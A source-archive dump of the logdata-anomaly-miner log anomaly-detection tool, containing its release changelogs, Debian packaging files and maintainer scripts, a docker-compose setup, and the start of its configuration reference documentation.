AnalysisComponentsPerformanceTests for the EventTypeDetector * Extended demo-config * Renamed whitelist to allowlist * Added warnings for non-existent resources * Changed default of auto_include_flag to false Bugfixes: * Fixed some exit() in forks * Fixed debian files * Fixed JSON output of the AffectedLogAtomValues in all detectors * Fixed normal output of the NewMatchPathValueDetector * Fixed reoccuring alerting in MissingMatchPathValueDetector -- Markus Wurzenberger Thu, 05 Nov 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.2) unstable; urgency=low Changes: * Added help parameters * Added help-screen * Added version parameter * Adden path and value filter * Change time model of ApacheAccessModel for arbitrary time zones * Update link to documentation * Added SECURITY.md * Refactoring * Updated man-page * Added unit-tests for loadYamlconfig Bugfixes: * Fixed header comment type in schema file * Fix debian files -- Markus Wurzenberger Wed, 17 Jul 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.1) unstable; urgency=low Changes: * Updated documentation * Updated testcases * Updated demos * Updated debian files * Added copyright headers * Added executable bit to AMiner -- Markus Wurzenberger Wed, 24 Jun 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.0) bionic; urgency=low Changes: * Updated documentation * Added functions getNameByComponent and getIdByComponent to AnalysisChild.py * Update DefaultMailNotificationEventHandler.py to python3 * Extended AMinerRemoteControl * Added support for configuration in yaml format * Refactoring * Added KafkaEventHandler * Added JsonConverterHandler * Added NewMatchIdValueComboDetector * Enabled multiple default timestamp paths * Added debug feature ParserCount * Added unit and integration tests * Added installer script * Added VerboseUnparsedHandler Bugfixes including: * Fixed dependencies in Debian packaging * Fixed typo in various analysis components * Fixed import of ModelElementInterface in various parsing components * Fixed issues with byte/string comparison * Fixed issue in DecimalIntegerValueModelElement, when parsing integer including sign and padding character * Fixed unnecessary long blocking time in SimpleMultisourceAtomSync * Changed minum matchLen in DelimitedDataModelElement to 1 byte * Fixed timezone offset in ModuloTimeMatchRule * Minor bugfixes -- Markus Wurzenberger Fri, 29 May 2020 17:00:00 +0000 logdata-anomaly-miner (1.0.0) bionic; urgency=low Changes: * Ported code to Python 3 * Code cleanup using pylint * Added util/JsonUtil.py to encode byte strings for storing them as json objects * Added docs/development-procedures.txt which documents development procedures Features: * New MissingMatchPathListValueDetector to detect stream interuption * Added parsing support for kernel IP layer martian package messages * Systemd parsing of apt invocation messages. Bugfixes: * AnalysisChild: handle remote control client connection errors correctly * Various bugfixes -- Markus Wurzenberger Tue, 2 Oct 2018 17:00:00 +0000 logdata-anomaly-miner (0.0.8) xenial; urgency=low Apart from bugfixes, new parsing and analysis components were added: * Base64StringModelElement * DecimalFloatValueModelElement * StringRegexMatchRule * EnhancedNewMatchPathValueComboDetector -- Roman Fiedler Tue, 30 May 2017 17:00:00 +0000 logdata-anomaly-miner (0.0.7) xenial; urgency=low The datetime parsing DateTimeModelElement was reimplemented to fix various shortcomings of strptime in Python and libc. This will require changes in configuration due to API changes, e.g.: -time_model=DateTimeModelElement('time', '%b %d %H:%M:%S', 15, False) +time_model=DateTimeModelElement('time', '%b %d %H:%M:%S') See /usr/lib/logdata-anomaly-miner/aminer/parsing/DateTimeModelElement.py source code documentation for currently supported datetime format options. The code for reading log input was improved to allow also input from UNIX sockets. Thus the configuration was changed to support those modes: -config_properties['LogFileList']=['/var/log/auth.log', ... +config_properties['LogResourceList'] = ['file:///var/log/auth.log', ... -- Roman Fiedler Mon, 9 Jan 2017 18:00:00 +0000 logdata-anomaly-miner (0.0.6) xenial; urgency=low The input IO-handling was redesigned, thus introducing following API changes. The changes are flaged with (D)eveloper and (U)ser to indicate if only developers of own AMiner addons are affected or also users may need to migrate their configuration. * Upper layers receive LogAtom objects instead of log lines, parsing data as separate parameters. Thus also separate paths for forwarding of parsed and unparsed atoms are not required any more. See below for details (D, U): * Update any own UnparsedAtomHandler/ParsedAtomHandlerInterface implementations to use new interface "input.AtomHandlerInterface" and access to additional information to new methods and fields (D): -from aminer.parsing import ParsedAtomHandlerInterface +from aminer.input import AtomHandlerInterface -class YourHandler(ParsedAtomHandlerInterface, ... +class YourHandler(AtomHandlerInterface, - def receiveParsedAtom(self, atom_data, parser_match): + def receive_atom(self, log_atom): - timestamp=parser_match.get_default_timestamp() + timestamp=log_atom.get_timestamp() + parser_match=log_atom.parser_match - print '%s' % atom_data + print '%s' % log_atom.rawData * With parsed/unparsed atom processing path convergence, naming of other classes does not make sense any more (U): -from aminer.analysis import VolatileLogarithmicBackoffParsedAtomHistory +from aminer.util import VolatileLogarithmicBackoffAtomHistory - from aminer.analysis import ParsedAtomFilters + from aminer.analysis import AtomFilters - match_action=Rules.ParsedAtomFilterMatchAction(... + match_action=Rules.AtomFilterMatchAction(... - parsed_atom_handlers=[] - unparsed_atom_handlers=[] - analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( - parsing_model, parsed_atom_handlers, unparsed_atom_handlers, ... + atom_filter=AtomFilters.SubhandlerFilter(None) + analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( + parsing_model, [atom_filter], ... For handling of unparsed atoms: - unparsed_atom_handlers.append(SimpleUnparsedAtomHandler(anomaly_event_handlers)) + atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), + stop_when_handled_flag=True) For handling of parsed atoms: - parsed_atom_handlers.append(... + atom_filter.add_handler(... -- Roman Fiedler Fri, 4 Nov 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.5) xenial; urgency=low Following API changes were introduced: * Lower input layers dealing with binary data stream reading, splitting into atoms and forwarding data to the parsing model were redesigned. Following configuration changes are required to adapt "config.py" and probably "analysis.py" to the new API: * analysis_context.register_component(): register_as_raw_atom_handler parameter not needed any more, can be removed. * SimpleParsingModelRawAtomHandler is not needed any more, that part can be replaced by configuration: # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( parsing_model, parsed_atom_handlers, unparsed_atom_handlers, anomaly_event_handlers, default_timestamp_paths=['/model/syslog/time']) * SimpleUnparsedAtomHandler was moved from "aminer.events" to "aminer.input". -- Roman Fiedler Mon, 11 Oct 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.4) xenial; urgency=low Following API changes were introduced: * Event handling (general): Change of EventHandlerInterface to include also event_source as last parameter. See /usr/lib/logdata-anomaly-miner/aminer/events/__init__.py * VolatileLogarithmicBackoffEventHistory: Added event ID and source to stored tuple to allow unique identification of events. Split result of "getHistory()" to include "eventId, eventType, event_message, sorted_log_lines, event_data, event_source". -- Roman Fiedler Fri, 26 Aug 2016 15:15:00 +0000 logdata-anomaly-miner (0.0.3) xenial; urgency=low Following API changes were introduced: * To improve readability of configuration files, main parser, analysis and event classes were added to the submodule namespaces. After imports directly from the submodule, e.g. "from aminer.parsing import FixedDataModelElement", the name duplication "FixedDataModelElement.FixedDataModelElement" is not required any more, "FixedDataModelElement" is sufficient. Use "sed -i -e 's/Name.Name/Name/g' [files]" to adapt. * Component timing was restructured to allow forensic/realtime triggering. Therefore also clean interface was added, which is now also used to reduce redundant code in component registration. Old way: analysis_context.register_component(new_match_path_detector, component_name=None, register_as_raw_atom_handler=False, register_as_time_triggered_handler=True) New way: analysis_context.register_component(new_match_path_detector, register_as_raw_atom_handler=False) For own custom time-triggered components, make sure to implement the "aminer.util.TimeTriggeredComponentInterface". Use any standard component, e.g. "/usr/lib/logdata-anomaly-miner/aminer/analysis/NewMatchPathDetector.py" as example. * Introduction of "AnalysisContext" to have common handle for all data required to perform the analysis. Therefore also the signature of "build_analysis_pipeline" in "config.py/analysis.py" has changed from def build_analysis_pipeline(aminer_config): to def build_analysis_pipeline(analysis_context): Old references to "aminer_config" within the configuration script have to be replaced by "analysis_context.aminer_config". -- Roman Fiedler Thu, 21 Jul 2016 19:00:00 +0000 logdata-anomaly-miner-2.8.0/debian/000077500000000000000000000000001500476301700171275ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/debian/changelog000066400000000000000000000131031500476301700207770ustar00rootroot00000000000000logdata-anomaly-miner (2.8.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.8.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.8.0 logdata-anomaly-miner (2.7.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.7.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.7.0 logdata-anomaly-miner (2.6.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.6.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.6.1 logdata-anomaly-miner (2.6.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.6.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.6.0 logdata-anomaly-miner (2.5.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.5.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.5.1 logdata-anomaly-miner (2.5.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.5.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.5.0 [ Sebastian Ramacher ] * debian/rules: Remove obsolete override * debian/control: Bump Standards-Version -- Markus Wurzenberger Mon, 06 Dec 2021 11:02:01 +0100 logdata-anomaly-miner (2.4.2-1) unstable; urgency=low * New upstream release V2.4.2, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.2 -- Markus Wurzenberger Tue, 23 Nov 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.1-1) unstable; urgency=low * New upstream release V2.4.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.1 -- Markus Wurzenberger Fri, 23 Jul 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.0-1) unstable; urgency=low * New upstream release V2.4.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.0 -- Markus Wurzenberger Fri, 04 Jun 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.1-1) unstable; urgency=low * New upstream release V2.3.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.3.1 -- Markus Wurzenberger Thu, 08 Apr 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.0-1) unstable; urgency=low * New upstream release V2.3.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.3.0 -- Markus Wurzenberger Mon, 29 Mar 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.2.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.2.1 [ Sebastian Ramacher ] * debian/patches: Removed, integrated upstream -- Markus Wurzenberger Mon, 25 Jan 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.2.0 [ Sebastian Ramacher ] * debian/control: - Bump Standards-Version - Set RRR: no * debian/logdata-anomaly-miner.maintscript: Move conffiles to new location * debian/logdata-anomaly-miner.links: Add link for aminer-peristence.py * debian/patches: Add hashbang to aminer-peristence.py * debian/rules: - Simplify rules by using execute_before_dh_auto_build target - Remove executable bits of some Python modules -- Markus Wurzenberger Tue, 22 Dec 2020 12:20:17 +0100 logdata-anomaly-miner (2.0.1-1) unstable; urgency=low * New upstream release V2.0.1 * Bump debhelper compat to 13 * Switch to new upstream location on Github * Update description * Provide upstream metadata -- Markus Wurzenberger Tue, 30 Jun 2020 14:42:46 +0200 logdata-anomaly-miner (1.0.0-1) unstable; urgency=low * New upstream release V1.0.0, see https://launchpad.net/logdata-anomaly-miner/+milestone/v1.0.0 -- Markus Wurzenberger Tue, 2 Oct 2018 17:00:00 +0000 logdata-anomaly-miner (0.0.8-1) unstable; urgency=low * New upstream release V0.0.8, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.8 -- Roman Fiedler Tue, 30 May 2017 17:00:00 +0000 logdata-anomaly-miner (0.0.7-1) unstable; urgency=low * New upstream release V0.0.7, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.7 -- Roman Fiedler Mon, 9 Jan 2017 18:00:00 +0000 logdata-anomaly-miner (0.0.6-1) unstable; urgency=low * New upstream release V0.0.6, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.6 -- Roman Fiedler Fri, 4 Nov 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.5-1) unstable; urgency=low * New upstream release (Closes: #840447). -- Roman Fiedler Tue, 11 Oct 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.3-2) unstable; urgency=low * Packaging fix: unowned directory after purge (Closes: #832347). -- Roman Fiedler Tue, 2 Aug 2016 15:15:00 +0000 logdata-anomaly-miner (0.0.3-1) unstable; urgency=low * New upstream release (Closes: #832058). -- Roman Fiedler Thu, 21 Jul 2016 19:00:00 +0000 logdata-anomaly-miner (0.0.2-1) unstable; urgency=low * Initial inclusion of logdata-anomaly-miner to Debian (Closes: #813096) -- Roman Fiedler Thu, 9 Jun 2016 12:00:00 +0000 logdata-anomaly-miner-2.8.0/debian/control000066400000000000000000000025501500476301700205340ustar00rootroot00000000000000Source: logdata-anomaly-miner Section: admin Priority: optional Maintainer: Markus Wurzenberger Build-Depends: debhelper-compat (= 13), dh-python, docbook-xsl, docbook-xml, python3, xsltproc Standards-Version: 4.6.0 Homepage: https://aecid.ait.ac.at/ Vcs-Git: https://github.com/ait-aecid/logdata-anomaly-miner.git Vcs-Browser: https://github.com/ait-aecid/logdata-anomaly-miner Rules-Requires-Root: no Package: logdata-anomaly-miner Architecture: all Depends: ${python3:Depends}, python3-tz, ${misc:Depends}, python3-cerberus, python3-pkg-resources, python3-setuptools Suggests: python3-scipy Description: tool for log analysis pipelines This tool allows one to analyze log data streams and detect violations or anomalies in it. It can be run from console, as daemon with e-mail alerting, or embedded as library into own programs. It was designed to run the analysis with limited resources and lowest possible permissions to make it suitable for production server use. Analysis methods include: . * log line parsing and filtering with extended syntax and options * detection of new data elements (IPs, user names, MAC addresses) * statistical anomalies in log line values and frequencies * correlation rules between log lines . The tool is suitable to operate as a sensor feeding a SIEM and distributing messages via message queues. logdata-anomaly-miner-2.8.0/debian/copyright000066400000000000000000000036041500476301700210650ustar00rootroot00000000000000Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ Upstream-Name: logdata-anomaly-miner Source: https://github.com/ait-aecid/logdata-anomaly-miner.git Files: * Copyright: 2016-2018, Roman Fiedler 2018-2021, Markus Wurzenberger 2018-2021, Max Landauer 2019-2021, Wolfgang Hotwagner 2019-2021, Ernst Leierzopf 2020-2021, Georg Hoeld 2016-2021, AIT Austrian Institute of Technology GmbH License: GPL-3.0+ Files: debian/* Copyright: 2016-2018, Roman Fiedler 2018-2021, Markus Wurzenberger 2018-2021, Max Landauer 2019-2021, Wolfgang Hotwagner 2019-2021, Ernst Leierzopf 2020-2021, Georg Hoeld 2016-2021, AIT Austrian Institute of Technology GmbH License: GPL-3.0+ License: GPL-3.0+ This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. . This package is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . You should have received a copy of the GNU General Public License along with this program. If not, see . . On Debian systems, the complete text of the GNU General Public License version 3 can be found in "/usr/share/common-licenses/GPL-3". logdata-anomaly-miner-2.8.0/debian/dirs000066400000000000000000000000171500476301700200110ustar00rootroot00000000000000var/lib/aminer logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.docs000066400000000000000000000000241500476301700241560ustar00rootroot00000000000000README.md changelog logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.install000066400000000000000000000000201500476301700246700ustar00rootroot00000000000000source/root/* / logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.links000066400000000000000000000003351500476301700243530ustar00rootroot00000000000000/usr/lib/logdata-anomaly-miner/aminer.py /usr/bin/aminer /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py /usr/bin/aminerremotecontrol /usr/lib/logdata-anomaly-miner/aminer-persistence.py /usr/bin/aminer-persistence logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.maintscript000066400000000000000000000003511500476301700255660ustar00rootroot00000000000000rm_conffile /etc/aminer/config.py.template 2.0.1-1~ rm_conffile /etc/init/aminer.conf 2.0.1-1~ mv_conffile /etc/aminer/conf-available/generic/EximParsingModel.py /etc/aminer/conf-available/generic/EximGenericParsingModel.py 2.2.0-1~ logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.manpages000066400000000000000000000000551500476301700250250ustar00rootroot00000000000000debian/aminer.1 debian/aminerremotecontrol.1 logdata-anomaly-miner-2.8.0/debian/postinst000077500000000000000000000023621500476301700207430ustar00rootroot00000000000000#!/bin/sh # postinst script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `configure' # * `abort-upgrade' # * `abort-remove' `in-favour' # # * `abort-remove' # * `abort-deconfigure' `in-favour' # `removing' # # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in configure) analysisUser="aminer" analysisGroup="aminer" # Prohibit read access to configuration for other processes if ! dpkg-statoverride --list /etc/aminer > /dev/null; then chown "root.${analysisGroup}" -- /etc/aminer chmod 00750 -- /etc/aminer fi if ! dpkg-statoverride --list /var/lib/aminer > /dev/null; then chmod 00700 -- /var/lib/aminer chown "${analysisUser}.${analysisGroup}" -- /var/lib/aminer fi ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.8.0/debian/postrm000077500000000000000000000015171500476301700204050ustar00rootroot00000000000000#!/bin/sh # postrm script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `remove' # * `purge' # * `upgrade' # * `failed-upgrade' # * `abort-install' # * `abort-install' # * `abort-upgrade' # * `disappear' # # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in remove) # Delete user, will also delete group. userdel "aminer" ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.8.0/debian/preinst000077500000000000000000000033201500476301700205370ustar00rootroot00000000000000#!/bin/sh # preinst script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `install' # * `install' # * `upgrade' # * `abort-upgrade' # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in install) # Create the user to run the analysis service. analysisGroup="aminer" if [ "$(getent group "${analysisGroup}")" = "" ]; then # Add a separate group for aitmon. # The group does not need to be a system group, but low gid is # preferable to avoid mixing with user groups. Using '--system' # flag would cause gid allocation to go down from UID_MIN, not # up from SYS_GID_MIN, so avoid using --system. groupadd -K GID_MIN=100 -K GID_MAX=1000 "${analysisGroup}" fi analysisUser="aminer" if [ "$(getent passwd "${analysisUser}")" = "" ]; then # Add a system user, set home directory to nonexisting directory # to avoid loading of user-defined files. Create user without # using '--system' flag, thus allocating UIDs upwards. useradd -M --shell /usr/sbin/nologin --gid "${analysisGroup}" -K PASS_MAX_DAYS=-1 -K UID_MIN=100 -K UID_MAX=999 --home /nonexistent "${analysisUser}" # There is no way to make useradd ommit assignment of subuids, # so remove them immediately on affected systems. if test -e /etc/subuid; then usermod --del-subuids 1-4294967295 --del-subgids 1-4294967295 "${analysisUser}" fi fi ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.8.0/debian/rules000077500000000000000000000014731500476301700202140ustar00rootroot00000000000000#!/usr/bin/make -f # -*- makefile -*- # Uncomment this to turn on verbose mode. # export DH_VERBOSE=1 %: dh $@ --with=python3 execute_before_dh_auto_build: xsltproc --nonet \ --param make.year.ranges 1 \ --param make.single.year.ranges 1 \ --param man.charmap.use.subset 0 \ -o debian/ \ http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl \ docs/manpages/aminer.1.xml docs/manpages/aminerremotecontrol.1.xml # Modify startup behaviour in auto-generated code in postinst: # Do not attempt to add aminer.service to autostart if user does # not want to have it running explicitely. See "Running as a Service" # from /usr/share/doc/aminer/Readme.txt.gz for more information. override_dh_installsystemd: dh_installsystemd --no-enable override_dh_installchangelogs: dh_installchangelogs changelog logdata-anomaly-miner-2.8.0/debian/source/000077500000000000000000000000001500476301700204275ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/debian/source/format000066400000000000000000000000141500476301700216350ustar00rootroot000000000000003.0 (quilt) logdata-anomaly-miner-2.8.0/debian/upstream/000077500000000000000000000000001500476301700207675ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/debian/upstream/metadata000066400000000000000000000021501500476301700224700ustar00rootroot00000000000000Bug-Database: https://github.com/ait-aecid/logdata-anomaly-miner/issues Bug-Submit: https://github.com/ait-aecid/logdata-anomaly-miner/issues/new Changelog: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/changelog Documentation: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/README.md Other-References: https://aecid.ait.ac.at/further-information/ Reference: - Author: Markus Wurzenberger and Florian Skopik and Giuseppe Settanni and Roman Fiedler Booktitle: Proceedings of the 4th International Conference on Information Systems Security and Privacy DOI: 10.5220/0006643003860397 ISBN: 978-989-758-282-0 Pages: 386-397 Publisher: SciTePress Title: "AECID: A Self-learning Anomaly Detection Approach based on Light-weight Log Parser Models" Type: inproceedings URL: https://www.scitepress.org/Link.aspx?doi=10.5220/0006643003860397 Year: 2018 Repository: https://github.com/ait-aecid/logdata-anomaly-miner.git Repository-Browse: https://github.com/ait-aecid/logdata-anomaly-miner Security-Contact: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/SECURITY.md logdata-anomaly-miner-2.8.0/debian/watch000066400000000000000000000003041500476301700201550ustar00rootroot00000000000000version=4 opts="filenamemangle=s%(?:.*?)?V?(\d[\d.]*)\.tar\.gz%logdata-anomaly-miner-$1.tar.gz%" \ https://github.com/ait-aecid/logdata-anomaly-miner/tags \ (?:.*?/)?V?(\d[\d.]*)\.tar\.gz logdata-anomaly-miner-2.8.0/docker-compose.yml000066400000000000000000000015611500476301700213450ustar00rootroot00000000000000version: "3" services: redpanda: image: docker.vectorized.io/vectorized/redpanda:latest command: ['start --overprovisioned --smp 1 --memory 1G --reserve-memory 0M --node-id 0 --check=false'] ports: - "9092:9092" - "9644:9644" akafka: image: aitaecid/akafka:latest environment: KAFKA_TOPICS: '["aminer"]' KAFKA_BOOTSTRAP_SERVERS: redpanda volumes: - '$PWD/akafka:/var/lib/akafka' links: - redpanda depends_on: - redpanda aminer: build: context: . volumes: - '$PWD/akafka:/var/lib/akafka' - '$PWD/aminercfg:/etc/aminer' - '$PWD/persistency:/var/lib/aminer' - '$PWD/logs:/logs' depends_on: - akafka logdata-anomaly-miner-2.8.0/docs/000077500000000000000000000000001500476301700166355ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/docs/CONFIGURATION.rst000066400000000000000000003474351500476301700214160ustar00rootroot00000000000000.. _Overview: ======== Overview ======== The logdata-anomaly-miner can be configured in two different formats: **yaml** and **python**. The preferred format is yaml and the default configuration file for it is */etc/aminer/config.yaml*. The python format can be configured in */etc/aminer/config.py* and offers advanced possibilities to configure the logdata-anomaly-miner. However, this is only recommended for experts, as no errors are caught in the python configuration, which can make debugging very difficult. For both formats there are template configurations in */etc/aminer/template\_config.yaml* and */etc/aminer/template\_config.py*. The basic structure of the logdata-anomaly-miner is illustrated in the folloging diagram: .. image:: images/aminer-config-color.png :alt: Structure of the configuration-file: GENERAL, INPUT, PARSING, ANALYSING, EVENTHANDLING ----------------- Analysis Pipeline ----------------- The core component of the logdata-anomaly-miner is the "analysis pipeline". It consists of the parts INPUT, ANALYSIS and OUTPUT. .. image:: images/analysis-pipeline.png :alt: Parts of the analysis-pipeline ======================= Command-line Parameters ======================= ---------- -h, --help ---------- Show the help message and exit. ------------- -v, --version ------------- Show program's version number and exit. ------------------- -u, --check-updates ------------------- Check if updates for the aminer are available and exit. -------------------------- -c CONFIG, --config CONFIG -------------------------- * Default: /etc/aminer/config.yml Use the settings of the file CONFIG on startup. Two config-variants are allowed: python and yaml. .. seealso:: :ref:`Overview` ------------ -D, --daemon ------------ Run aminer as a daemon process. -------------------------- -s {0,1,2}, --stat {0,1,2} -------------------------- Set the stat level. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for verbose statistics. --------------------------- -d {0,1,2}, --debug {0,1,2} --------------------------- Set the debug level. Possible debug-levels are 0 for no debugging, 1 for normal output (INFO and above), 2 for printing all debug information. -------------- --run-analysis -------------- Run aminer analysis-child. .. note:: This parameter is for internal use only. ----------- -C, --clear ----------- Remove all persistence directories and run aminer. -------------------------- -r REMOVE, --remove REMOVE -------------------------- Remove a specific persistence directory. REMOVE must be the name of the directory and must not contain '/' or '.'. Usually this directory can be found in '/var/lib/aminer'. ----------------------------- -R RESTORE, --restore RESTORE ----------------------------- Restore a persistence backup. RESTORE must be the name of the directory and must not contain '/' or '.'. Usually this directory can be found in '/var/lib/aminer'. ---------------- -f, --from-begin ---------------- Removes repositioning data before starting the aminer so that all input files will be analyzed starting from the first line in the file rather than the last previously analyzed line. ------------------ -o, --offline-mode ------------------ Stop the aminer after all logs have been processed. .. note:: This parameter is useful for forensic analysis. --------------------------------------------- --config-properties KEY=VALUE [KEY=VALUE ...] --------------------------------------------- Set a number of config_properties by using key-value pairs (do not put spaces before or after the = sign). If a value contains spaces, you should define it with double quotes: 'foo="this is a sentence". Note that values are always treated as strings. If values are already defined in the config_properties, the input types are converted to the ones already existing. ======================= Configuration Reference ======================= --------------------- General Configuration --------------------- LearnMode ~~~~~~~~~ * Type: boolean (True,False) * Default: False This options turns the LearnMode on globally. .. warning:: This option can be overruled by the learn_mode that is configurable per analysis component. .. code-block:: yaml LearnMode: True AminerUser ~~~~~~~~~~ * Default: aminer This option defines the system-user that owns the aminer-process. .. code-block:: yaml AminerUser: 'aminer' AminerGroup ~~~~~~~~~~~ * Default: aminer This option defines the system-group that owns the aminer-process. .. code-block:: yaml AminerGroup: 'aminer' AnalysisConfigFile ~~~~~~~~~~~~~~~~~~ * Default: None This (optional) configuration file contains the whole analysis child configuration (code). When missing those configuration parameters are also taken from the main config. .. warning:: This option is only available for python configs. It does not work for yaml configs. .. code-block:: python config_properties['AnalysisConfigFile'] = 'analysis.py' RemoteControlSocket ~~~~~~~~~~~~~~~~~~~ This option controls where the unix-domain-socket for the RemoteControl should be created. The socket will not be created if this option is not set. .. code-block:: yaml RemoteControlSocket: '/var/lib/aminer/remcontrol.sock' SuppressNewMatchPathDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: False * Type: boolean (True,False) Disable the output of the NewMatchPathDetector which detects new paths for logtypes. .. code-block:: yaml SuppressNewMatchPathDetector: False LogResourceList ~~~~~~~~~~~~~~~ * Required: **True** * Resource-Types: ``file://``, ``unix://`` Define the list of log resources to read from: the resources named here do not need to exist when aminer is started. This will just result in a warning. However if they exist, they have to be readable by the aminer process! Every resource needs to define the ``url`` with the resource-type. Optionally every resource can define ``json`` parameter (boolean) to define if the resource input data is json and ``parser_id`` to define the parser which should process the log data from this resource. By default the ``json_format`` parameter in the ``input`` section is used to determine if the input data is json or not. Supported types are: * file://[path]: Read data from file, reopen it after rollover * unix://[path]: Open the path as UNIX local socket for reading .. code-block:: yaml LogResourceList: - url: 'file:///var/log/apache2/access.log' - url: 'file:///home/ubuntu/data/mail.cup.com-train/daemon.log' json: True parser_id: 'syslog_parser' - url: 'file:///home/ubuntu/data/mail.cup.com-train/auth.log' - url: 'file:///home/ubuntu/data/mail.cup.com-train/suricata/eve.json' - url: 'file:///home/ubuntu/data/mail.cup.com-train/suricata/fast.log' json: True parser_id: 'suricata_fastlog' Core.PersistenceDir ~~~~~~~~~~~~~~~~~~~ * Default: /var/lib/aminer Read and store information to be used between multiple executions of aminer in this directory. The directory must only be accessible to the 'AminerUser' but not group/world readable. On violation, aminer will refuse to start. .. code-block:: yaml Core.PersistenceDir: '/var/lib/aminer' Core.PersistencePeriod ~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 This options controls whether the logdata-anomaly-miner should write its persistency to disk. .. code-block:: yaml Core.PersistencePeriod: 600 Core.LogDir ~~~~~~~~~~~ * Default: /var/lib/aminer/log Directory for logfiles. This directory must be writeable to the 'AminerUser'. .. code-block:: yaml Core.LogDir: '/var/lib/aminer/log' MailAlerting.TargetAddress ~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: disabled Define a target e-mail address to send alerts to. When undefined, no e-mail notification hooks are added. .. code-block:: yaml MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress ~~~~~~~~~~~~~~~~~~~~~~~~ Sender address of e-mail alerts. When undefined, "sendmail" implementation on host will decide, which sender address should be used. .. code-block:: yaml MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix ~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: "aminer Alerts" Define, which text should be prepended to the standard aminer subject. .. code-block:: yaml MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime ~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 0 (any event can immediately trigger alerting) Define a grace time after startup before aminer will react to an event and send the first alert e-mail. .. code-block:: yaml MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 10 Define how many seconds to wait after a first event triggered the 